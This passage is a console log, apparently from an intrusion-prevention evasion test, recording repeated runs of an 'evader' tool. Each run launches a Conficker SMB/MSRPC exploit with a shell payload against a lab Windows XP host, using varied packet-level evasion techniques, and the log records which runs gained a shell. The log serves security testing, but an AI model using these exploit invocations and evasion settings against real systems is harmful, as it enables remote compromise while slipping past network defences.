- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 6339 runs averaging 2.02 runs / second ; progress: 3139/43200........
- 6347 runs averaging 2.02 runs / second ; progress: 3144/43200......
- 6353 runs averaging 2.02 runs / second ; progress: 3149/43200..
- 6355 runs averaging 2.01 runs / second ; progress: 3154/43200.
- 6356 runs averaging 2.01 runs / second ; progress: 3159/43200........
- 6364 runs averaging 2.01 runs / second ; progress: 3164/43200.......
- 6371 runs averaging 2.01 runs / second ; progress: 3169/43200
- 6371 runs averaging 2.01 runs / second ; progress: 3174/43200
- 6371 runs averaging 2.00 runs / second ; progress: 3179/43200....
- 6375 runs averaging 2.00 runs / second ; progress: 3184/43200.........
- 6384 runs averaging 2.00 runs / second ; progress: 3189/43200....
- 6388 runs averaging 2.00 runs / second ; progress: 3194/43200
- 6388 runs averaging 2.00 runs / second ; progress: 3199/43200
- 6388 runs averaging 1.99 runs / second ; progress: 3204/43200.....Pid 16099 timed out - killed
- 2015-06-08 00:12:58 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37388 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=ZvuU2DLSbLs --evasion=[msrpc_req,end]ipv4_opt,"8","inc","shuffle" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"4","3","1","zero" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed ZvuU2DLSbLt
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of zeroes.
- The following evasions are applied from stage msrpc_req to end:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled payload
- Info: NetBIOS connection 10.62.90.110:37388 -> 10.35.1.207:445
- Terminated
- ...
- 6397 runs averaging 1.99 runs / second ; progress: 3209/43200............
- 6409 runs averaging 1.99 runs / second ; progress: 3214/43200.......
- 6416 runs averaging 1.99 runs / second ; progress: 3219/43200....2015-06-08 00:13:13 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34064 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=ecbhHa4ykX8 --evasion=[msrpc_bind,end]ipv4_frag,"1416" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","238925499","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed ecbhHa4ykX9
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238925499> and has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - IPv4 fragments with at most 1416 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:34064 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 6421 runs averaging 1.99 runs / second ; progress: 3224/43200.....
- 6426 runs averaging 1.99 runs / second ; progress: 3229/43200...........
- 6437 runs averaging 1.99 runs / second ; progress: 3234/43200.....
- 6442 runs averaging 1.99 runs / second ; progress: 3239/43200..
- 6444 runs averaging 1.99 runs / second ; progress: 3244/43200.Pid 17583 timed out - killed
- 2015-06-08 00:13:38 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35275 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=123aANpGaM8 --evasion=[msrpc_req,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 123aANpGaM/
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:35275 -> 10.35.1.207:445
- Terminated
- .
- 6447 runs averaging 1.98 runs / second ; progress: 3249/43200.Pid 17709 timed out - killed
- 2015-06-08 00:13:40 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17433 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=n87ySzclSe0 --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]smb_decoytrees,"2","2","997","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed n87ySzclSe2
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 997 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.112:17433 -> 10.35.1.207:445
- Terminated
- .....
- 6454 runs averaging 1.98 runs / second ; progress: 3254/43200........
- 6462 runs averaging 1.98 runs / second ; progress: 3259/43200.....
- 6467 runs averaging 1.98 runs / second ; progress: 3264/43200........Pid 18131 timed out - killed
- 2015-06-08 00:13:58 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39853 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=AwsTHx1TWIM --evasion=[smb_connect,end]smb_writeandxpad,"8","zero" --evasion=[smb_openpipe,msrpc_req]tcp_chaff,"5","chksum|nullchksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed AwsTHx1TWIM
- The following evasions are applied from stage smb_connect to end:
- - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - With every 5 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alpha bytes as payload
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.119:39853 -> 10.35.1.207:445
- Terminated
- ....
- 6480 runs averaging 1.98 runs / second ; progress: 3269/43200.....
- 6485 runs averaging 1.98 runs / second ; progress: 3274/43200
- 6485 runs averaging 1.98 runs / second ; progress: 3279/43200..
- 6487 runs averaging 1.98 runs / second ; progress: 3284/43200...........
- 6498 runs averaging 1.98 runs / second ; progress: 3289/43200..............
- 6512 runs averaging 1.98 runs / second ; progress: 3294/43200...
- 6515 runs averaging 1.97 runs / second ; progress: 3299/43200
- 6515 runs averaging 1.97 runs / second ; progress: 3304/43200.....
- 6520 runs averaging 1.97 runs / second ; progress: 3309/43200...2015-06-08 00:14:42 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28413 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=roD2a76i9NE --evasion=[msrpc_bind,end]tcp_paws,"75%","268435453","zero" --evasion=[msrpc_bind,msrpc_req]tcp_seg,"4" --verifydelay=1000 --payload=shell
- Info: Using random seed roD2a76i9NG
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has 0x00 bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - TCP packets are segmented to contain at most 4 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:28413 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 6527 runs averaging 1.97 runs / second ; progress: 3314/43200.2015-06-08 00:14:46 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22205 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=yAqSbF7a2AM --evasion=[msrpc_req,end]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed yAqSbF7a2AP
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage msrpc_req to end:
- - IPv4 fragments with at most 24 bytes per fragment
- Info: NetBIOS connection 10.62.90.112:22205 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 6532 runs averaging 1.97 runs / second ; progress: 3319/43200....
- 6536 runs averaging 1.97 runs / second ; progress: 3324/43200.......
- 6543 runs averaging 1.97 runs / second ; progress: 3329/43200..
- 6545 runs averaging 1.96 runs / second ; progress: 3334/43200
- 6545 runs averaging 1.96 runs / second ; progress: 3339/43200
- 6545 runs averaging 1.96 runs / second ; progress: 3344/43200.
- 6546 runs averaging 1.95 runs / second ; progress: 3349/43200
- 6546 runs averaging 1.95 runs / second ; progress: 3354/43200Pid 19330 timed out - killed
- 2015-06-08 00:15:29 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53161 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oMEwt4ZkuNY --evasion=[smb_connect,msrpc_bind]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"5","51454" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed oMEwt4ZkuNa
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 5 and 51454 bytes of payload.
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.116:53161 -> 10.35.1.207:445
- Terminated
- 6547 runs averaging 1.95 runs / second ; progress: 3359/43200.........
- 6556 runs averaging 1.95 runs / second ; progress: 3364/43200..Pid 19484 timed out - killed
- 2015-06-08 00:15:36 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=RiI6C+8sOvQ --evasion=[start,msrpc_bind]ipv4_frag,"352" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed RiI6C+8sOvR
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments with at most 352 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:56602 -> 10.35.1.207:445
- Terminated
- ..Pid 19507 timed out - killed
- 2015-06-08 00:15:37 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30669 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=uTRrvWQWLxA --evasion=[smb_opentree,msrpc_req]ipv4_frag,"312" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed uTRrvWQWLxC
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - IPv4 fragments with at most 312 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.114:30669 -> 10.35.1.207:445
- Terminated
- 2015-06-08 00:15:37 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25027 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=vYkbu33Qkdw --evasion=[smb_connect,end]netbios_chaff,"1","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_paws,"2","8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed vYkbu33Qkdy
- The following evasions are applied from stage smb_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.113:25027 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..........
- 6573 runs averaging 1.95 runs / second ; progress: 3370/43200........
- 6581 runs averaging 1.95 runs / second ; progress: 3375/43200
- 6581 runs averaging 1.95 runs / second ; progress: 3380/43200..
- 6583 runs averaging 1.94 runs / second ; progress: 3385/43200.......
- 6590 runs averaging 1.94 runs / second ; progress: 3390/43200.............
- 6603 runs averaging 1.95 runs / second ; progress: 3395/43200.......2015-06-08 00:16:09 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=PeJtMGJRh88 --evasion=[smb_openpipe,msrpc_req]ipv4_opt,"3","inc","shuffle" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"6","zero" --evasion=[netbios_connect,end]tcp_paws,"1","145135867","random" --verifydelay=1000 --payload=shell
- Info: Using random seed PeJtMGJRh88
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 145135867> and has random bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled payload
- Info: NetBIOS connection 10.62.90.113:24268 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 6613 runs averaging 1.95 runs / second ; progress: 3400/43200..2015-06-08 00:16:11 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25887 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=fnJDHWfO8Io --evasion=[smb_connect,smb_openpipe]netbios_chaff,"25%","empty_unspec|empty_keepalive|msrpc_req" --evasion=[smb_openpipe,end]tcp_paws,"75%","88733991","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed fnJDHWfO8Ip
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 88733991> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.114:25887 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....
- 6621 runs averaging 1.94 runs / second ; progress: 3405/43200...
- 6624 runs averaging 1.94 runs / second ; progress: 3410/43200
- 6624 runs averaging 1.94 runs / second ; progress: 3415/43200......
- 6630 runs averaging 1.94 runs / second ; progress: 3420/43200..............
- 6644 runs averaging 1.94 runs / second ; progress: 3425/43200..............
- 6658 runs averaging 1.94 runs / second ; progress: 3430/43200............
- 6670 runs averaging 1.94 runs / second ; progress: 3435/43200....Pid 20341 timed out - killed
- 2015-06-08 00:16:47 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16556 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=RMgfaYyc57k --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed RMgfaYyc57l
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.117:16556 -> 10.35.1.207:445
- Terminated
- .........
- 6684 runs averaging 1.94 runs / second ; progress: 3440/43200...........
- 6695 runs averaging 1.94 runs / second ; progress: 3445/43200.....2015-06-08 00:16:58 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38858 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=9ilraWnyxh4 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"25%","4","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","4961990","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 9ilraWnyxh7
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4961990> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.113:38858 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 6705 runs averaging 1.94 runs / second ; progress: 3450/43200........
- 6713 runs averaging 1.94 runs / second ; progress: 3455/43200.........
- 6722 runs averaging 1.94 runs / second ; progress: 3460/43200..........
- 6732 runs averaging 1.94 runs / second ; progress: 3465/43200.....
- 6737 runs averaging 1.94 runs / second ; progress: 3470/43200...
- 6740 runs averaging 1.94 runs / second ; progress: 3475/43200.....
- 6745 runs averaging 1.94 runs / second ; progress: 3480/43200............
- 6757 runs averaging 1.94 runs / second ; progress: 3485/432002015-06-08 00:17:35 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29037 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=zoGhygQj2a0 --evasion=[smb_connect,msrpc_bind]ipv4_opt,"2","inc","shuffletcp" --evasion=[smb_openpipe,end]tcp_paws,"50%","33475370","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed zoGhygQj2a3
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_openpipe to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33475370> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.114:29037 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 6764 runs averaging 1.94 runs / second ; progress: 3490/43200....
- 6768 runs averaging 1.94 runs / second ; progress: 3495/43200.......
- 6775 runs averaging 1.94 runs / second ; progress: 3500/43200........
- 6783 runs averaging 1.94 runs / second ; progress: 3505/43200.
- 6784 runs averaging 1.93 runs / second ; progress: 3510/43200
- 6784 runs averaging 1.93 runs / second ; progress: 3515/43200
- 6784 runs averaging 1.93 runs / second ; progress: 3520/43200....
- 6788 runs averaging 1.93 runs / second ; progress: 3525/43200.....
- 6793 runs averaging 1.92 runs / second ; progress: 3530/43200..Pid 21204 timed out - killed
- 2015-06-08 00:18:21 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33089 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BaIgcwZW4VQ --evasion=[start,netbios_connect]tcp_chaff,"2","nullchksum|nullflag|longhdr","unmodified" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1478","new","random" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed BaIgcwZW4VQ
- The following evasions are applied from stage start to netbios_connect:
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.118:33089 -> 10.35.1.207:445
- Terminated
- ........
- 6804 runs averaging 1.92 runs / second ; progress: 3535/43200.....
- 6809 runs averaging 1.92 runs / second ; progress: 3540/43200......
- 6815 runs averaging 1.92 runs / second ; progress: 3545/43200......
- 6821 runs averaging 1.92 runs / second ; progress: 3550/43200.........
- 6830 runs averaging 1.92 runs / second ; progress: 3555/43200Pid 21497 timed out - killed
- 2015-06-08 00:18:45 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62671 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o7JIQ5gkSRo --evasion=[msrpc_bind,end]ipv4_frag,"56" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed o7JIQ5gkSRq
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - IPv4 fragments with at most 56 bytes per fragment
- Info: NetBIOS connection 10.62.90.115:62671 -> 10.35.1.207:445
- Terminated
- .....
- 6836 runs averaging 1.92 runs / second ; progress: 3560/43200.......
- 6843 runs averaging 1.92 runs / second ; progress: 3565/43200Pid 21595 timed out - killed
- 2015-06-08 00:18:55 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13471 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xLQU+B0/gW8 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"1","3","8","random" --evasion=[msrpc_bind,end]smb_seg,"4" --evasion=[smb_opentree,end]tcp_paws,"2","2","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed xLQU+B0/gW/
- The following evasions are applied from stage smb_opentree to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - SMB writes are segmented to contain at most 4 bytes of payload.
- Info: NetBIOS connection 10.62.90.110:13471 -> 10.35.1.207:445
- Terminated
- ............
- 6856 runs averaging 1.92 runs / second ; progress: 3570/43200..................
- 6874 runs averaging 1.92 runs / second ; progress: 3575/43200.....
- 6879 runs averaging 1.92 runs / second ; progress: 3581/43200.
- 6880 runs averaging 1.92 runs / second ; progress: 3586/43200.....
- 6885 runs averaging 1.92 runs / second ; progress: 3591/43200.........2015-06-08 00:19:24 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22534 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=E1WN1gofr4c --evasion=[start,netbios_connect]tcp_paws,"25%","2","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","5","alpharandomized" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed E1WN1gofr4c
- The following evasions are applied from stage start to netbios_connect:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.116:22534 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 6895 runs averaging 1.92 runs / second ; progress: 3596/43200..Pid 22023 timed out - killed
- 2015-06-08 00:19:27 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27003 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=EpXCyMOuFpI --evasion=[msrpc_bind,end]smb_seg,"6" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed EpXCyMOuFpI
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
